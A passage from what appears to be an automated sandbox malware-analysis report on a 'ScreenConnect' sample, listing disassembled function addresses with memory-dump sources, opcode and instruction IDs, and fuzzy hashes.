                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 895f16a1153de5c9979e28ee2b2dc11277d347a7804169030419c8c0916b751f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21019E7240D3C09FD7164B259C94752BFB8EF53624F1984DBE8888F2A3C2695C45C772
                                                                                                                                                                                                                                                                          Function 00BAA9C8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fc9d79df99ef68fe6ad209d1f496052774099b54b757ab44b081ae5df50a478c
                                                                                                                                                                                                                                                                          • Instruction ID: 593104ba7af41170158c15382003ac05a88b6d2b1482bb4d2849568cbf0c3390
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc9d79df99ef68fe6ad209d1f496052774099b54b757ab44b081ae5df50a478c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44018F31B042155B8B189B59E85045BBAE9EBC862031449BAD515DB305DBB1DC06CBD0
                                                                                                                                                                                                                                                                          Function 00BA1320 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4e335be92899d6cdfb40d9c8a2d651417d7281273e340ffd9f2ecaa3500a2527
                                                                                                                                                                                                                                                                          • Instruction ID: 454675eafd3a872456acad6c6164756e996d5a735b57c3b079ad8fc675a4e42a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e335be92899d6cdfb40d9c8a2d651417d7281273e340ffd9f2ecaa3500a2527
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5801B57060D3845FCB81DB78885169CBFF19F57204F5985DAC489CF283D6268903CB56
                                                                                                                                                                                                                                                                          Function 00B3D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3272721890.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_b3d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f0f6641cb6740469020686e8af6f382905f9e5f95ee74728b45071367a8be0e1
                                                                                                                                                                                                                                                                          • Instruction ID: 0d25159b416c662375a72590287c64d7920a710aff5808af8a2ae14fa98c6e5c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0f6641cb6740469020686e8af6f382905f9e5f95ee74728b45071367a8be0e1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97012B31504304EED7248B25DCC4B67BFDCEF45720F38C4A9ED480B286C2799801CAB1
                                                                                                                                                                                                                                                                          Function 00BA8CF7 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fd79474b427b9af5ef2863c5f233bd4d4913e4cec9cad6d88683d7050fac124f
                                                                                                                                                                                                                                                                          • Instruction ID: 12f140b2ba75a564944b9921ecac09572d26e5cea440f6b771a108b40947594a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd79474b427b9af5ef2863c5f233bd4d4913e4cec9cad6d88683d7050fac124f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2401A2357082445FC701DF6CD88096A7BF9EF8536031446AAE459CB7A6DB31DC068790
                                                                                                                                                                                                                                                                          Function 00BA6461 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 07d01ecba06a4176ed00b06b41b49cf15f95e89ac30e8059d2ed173f120418dd
                                                                                                                                                                                                                                                                          • Instruction ID: a22fb4b1b664bd396eb7f18a9f42aa24c2a77421ac6f3d983991917272a2aaa8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07d01ecba06a4176ed00b06b41b49cf15f95e89ac30e8059d2ed173f120418dd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3F0C2713042046FC714DBACE884D4EBBEDEF8A760714856AE409CB395EA72ED0587A0
                                                                                                                                                                                                                                                                          Function 00BA8B40 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d4f7421af55c94ad7e885622d17682bcfccc090aa44b8b449cd12c9edd5b3055
                                                                                                                                                                                                                                                                          • Instruction ID: 449cf3572b114e0ae1e49f26a8a0f7caa24b1711966e579f48da5749b08877ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4f7421af55c94ad7e885622d17682bcfccc090aa44b8b449cd12c9edd5b3055
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB012832D0015DDBCB09DFA9E9548CDBBF6EF89314F05846AE505BB264DB316906CBA0
                                                                                                                                                                                                                                                                          Function 00BA31E0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 35cef063ba0d78192c8edfaf1382c060f0c2307549fb1746b48573e34fd25367
                                                                                                                                                                                                                                                                          • Instruction ID: 88e73d49f11e6a00324bb82532c3018d3629cf99912e5aa62f4eaed9fc4a21e1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35cef063ba0d78192c8edfaf1382c060f0c2307549fb1746b48573e34fd25367
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A801287080C388AFCB45EBA8D8966ADBFF4EB06B10F6440EAE505A7252E7355B44DB41
                                                                                                                                                                                                                                                                          Function 00BA329C Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2d7e9e533541bd87ab30932e8a34def92d44298274e35634f4b268e90c6bf306
                                                                                                                                                                                                                                                                          • Instruction ID: babdf68338174c3c1dc13ccef334bc09875d408e1afb578abc85ad3729e634dc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d7e9e533541bd87ab30932e8a34def92d44298274e35634f4b268e90c6bf306
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63F04C6250D3804FDB16C778B8916993FE0EEA7350B5909EFE082CF563D618A74AC351
                                                                                                                                                                                                                                                                          Function 00BABCC8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b975184c0d45c545ddf71108ae55c76b0bb2e39c715efcc5589bcb577ee186a8
                                                                                                                                                                                                                                                                          • Instruction ID: ba8c5fa6465bfb90d84d6d4fafb4eed41d2cd0c2720c35e05f2920b1f5cfd75a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b975184c0d45c545ddf71108ae55c76b0bb2e39c715efcc5589bcb577ee186a8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37F05836B0D2085AD728CABEA400A9BBBEECBD4220B1484BFE55DC3641E931A8008764
                                                                                                                                                                                                                                                                          Function 00BAE260 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9c02a5df2899813c1f9da0ca42a13f8605882856f8688b9fdd6e0a8eaef5f724
                                                                                                                                                                                                                                                                          • Instruction ID: 99e5bbd14e25b069fdd96037a2bbcdb454e45b2eab9e715a6c99ef64f2938bb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c02a5df2899813c1f9da0ca42a13f8605882856f8688b9fdd6e0a8eaef5f724
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E001C9B1D00219DFCB45DFADD8416DEBBF5EF8A310B2481A6D818DB215E3319A16CBD1
                                                                                                                                                                                                                                                                          Function 00BAF640 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 48a227a68f81d899d6a155d1fc3fa190cf561eb5d6f19aaedf815f07b6bd47ac
                                                                                                                                                                                                                                                                          • Instruction ID: afde52ae3d8b6c6b08b8dc02bb5d656d42ded4c65480397f4b29250d76a4d78c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48a227a68f81d899d6a155d1fc3fa190cf561eb5d6f19aaedf815f07b6bd47ac
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF089363002196F8F09AFD89C409AF3BEBEBC8360B00446AF605C7351DB354D1197A5
                                                                                                                                                                                                                                                                          Function 00BA5920 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 62717b0ab788313626c5137f5b96dba83db783f191755523765c633671fbd2c9
                                                                                                                                                                                                                                                                          • Instruction ID: 7d5c76ffee083cfcbee6693963db7d8216d3e4d601925a2755b994ff0e552bf8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62717b0ab788313626c5137f5b96dba83db783f191755523765c633671fbd2c9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF02B713156989FC715A678A85842E7FA59ADA22131480EED512C7387CE249902CF90
                                                                                                                                                                                                                                                                          Function 00BA6470 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 8ba80b080eb096cd5304b5cb81f9894ea1deea881e499dbe65d3bf04ffa2ca6f
                                                                                                                                                                                                                                                                          • Instruction ID: 5d641423f92bab9b66ab36c655e655489b3d68861e464d119c51d44f11199748
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ba80b080eb096cd5304b5cb81f9894ea1deea881e499dbe65d3bf04ffa2ca6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F05E313002045F8714DAADE884D5FBBEDEFC97A0714863AE509CB354DB71ED0587A0
                                                                                                                                                                                                                                                                          Function 00BA8D08 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 33a078093b4812185db4864b7a494750546f2b99416e443a19697d21ab67ed00
                                                                                                                                                                                                                                                                          • Instruction ID: ec6729f89d43dbec2913cb9ec62d6b0718792ef75a7bce799b01b7549ab9bfe5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33a078093b4812185db4864b7a494750546f2b99416e443a19697d21ab67ed00
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF05E317002056F8714DA6DE880E5BBBEDEF857A0714857AE419CB3A4DB71ED0687A0
                                                                                                                                                                                                                                                                          Function 00BAFA08 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 16aced9e5e16be7025fa2661e9fb0a099748b03fbf93f774277c6839794d9d6f
                                                                                                                                                                                                                                                                          • Instruction ID: 5a2ae09351255ec5d97a4c9ae45fa077ab620009c8955a31a6714bd1b934b5d2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16aced9e5e16be7025fa2661e9fb0a099748b03fbf93f774277c6839794d9d6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7F0E2317043029BC715A79EE8809ABBBEEDFC5B1030485BAE229CB314DF60EC098790
                                                                                                                                                                                                                                                                          Function 00BAE618 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d3f1d475e9ab248f09fee69be4784d8c7de2e4abb0d434bc550fce6108ca486d
                                                                                                                                                                                                                                                                          • Instruction ID: 8630a6441bdefc97237005d8586dcc56489a83c45bc0217cb6813e7c3675bc91
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3f1d475e9ab248f09fee69be4784d8c7de2e4abb0d434bc550fce6108ca486d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCF09A74A0A2459FC705CB68D891A1EBBF5EF97300B14C4EAED00CB396DA31DD12C790
                                                                                                                                                                                                                                                                          Function 00BAAA48 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1c5dce97eeae8ed5f9629f00b1414ee671c2d77e011c8561eb6d80f0d336cd70
                                                                                                                                                                                                                                                                          • Instruction ID: d77007d48e235c8c0948e166fe324520481d327a117fd4d5e4fa37c4cbb6d02b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c5dce97eeae8ed5f9629f00b1414ee671c2d77e011c8561eb6d80f0d336cd70
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BF0A7313046504FCB156FADA4D866E7FE6EBC975171405BEE106C7342CE754C06CB65
                                                                                                                                                                                                                                                                          Function 00BA52E8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6b6027255d5fa993f92412eeefb7aadf033f274dbe55ade484708a5b38d58120
                                                                                                                                                                                                                                                                          • Instruction ID: 9c15201c66f721b15560d2ee13d7c697d0d95304dbfb46b92f341e239b1e6407
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b6027255d5fa993f92412eeefb7aadf033f274dbe55ade484708a5b38d58120
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F05CB1D0C7483FCB1986ACAC616EDBFF49F97310B1840EBD089C7243D8264E068754
                                                                                                                                                                                                                                                                          Function 00BA31F0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: c52e7b94ee9d88ded73b0d03acbfece72de5da2e060204fc27ff0ed5ce4c64e1
                                                                                                                                                                                                                                                                          • Instruction ID: 73c9aebd966f6e403f64026a7fa8cc3c2238e461df990cfc970023c2181e1980
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c52e7b94ee9d88ded73b0d03acbfece72de5da2e060204fc27ff0ed5ce4c64e1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F01F34A0838CEFCB44EBA8D595A9CBBF4FB04740F6040A8E405A7210DB34AF84DB40
                                                                                                                                                                                                                                                                          Function 00BABCBB Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 468bcd4d83bdb086a396f4be04febe5726c40d05e3428467ae8ef4703937bd5f
                                                                                                                                                                                                                                                                          • Instruction ID: 41d4cc1722ee88cc474b891f20b5b3cf561dfe0475fa5616ba7f711352845418
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 468bcd4d83bdb086a396f4be04febe5726c40d05e3428467ae8ef4703937bd5f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7F0A032A0D3945EC715CBBA9801D9B7FE9CFC621070880BFD049C3691D92494018725
                                                                                                                                                                                                                                                                          Function 00BAE2AA Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a4009417cc80e59f22fc0eb76aec155941ec97d331c69aa741c8cd9094263344
                                                                                                                                                                                                                                                                          • Instruction ID: f7006a40efa5ef6c6ec2f5650caceb019954b7f5ac56c9bc8e9a862cc89aeca5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4009417cc80e59f22fc0eb76aec155941ec97d331c69aa741c8cd9094263344
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08F05E30B00115CFC715DF6DD564AAEBBE5EF8935170480A9E819CB364EB34DD01CB81
                                                                                                                                                                                                                                                                          Function 00BAEBA0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 88c2666933d2e4493cf2be9de6d4c2392d2aadc6365c61b7b33fbdefba73b26b
                                                                                                                                                                                                                                                                          • Instruction ID: 8c78c7d0c7d6c1156514c9345e6137ac52b93ad13699eff699f0d86dd579a680
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88c2666933d2e4493cf2be9de6d4c2392d2aadc6365c61b7b33fbdefba73b26b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FE030357082086B4B04CA4AD440D5BBBEADBC9360714C066F919C7355DA31DD028BA4
                                                                                                                                                                                                                                                                          Function 00BA0E20 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f1311b120c52b3ae96ac774254368dbff2a4c2a1df4d179601a49450b0ee0209
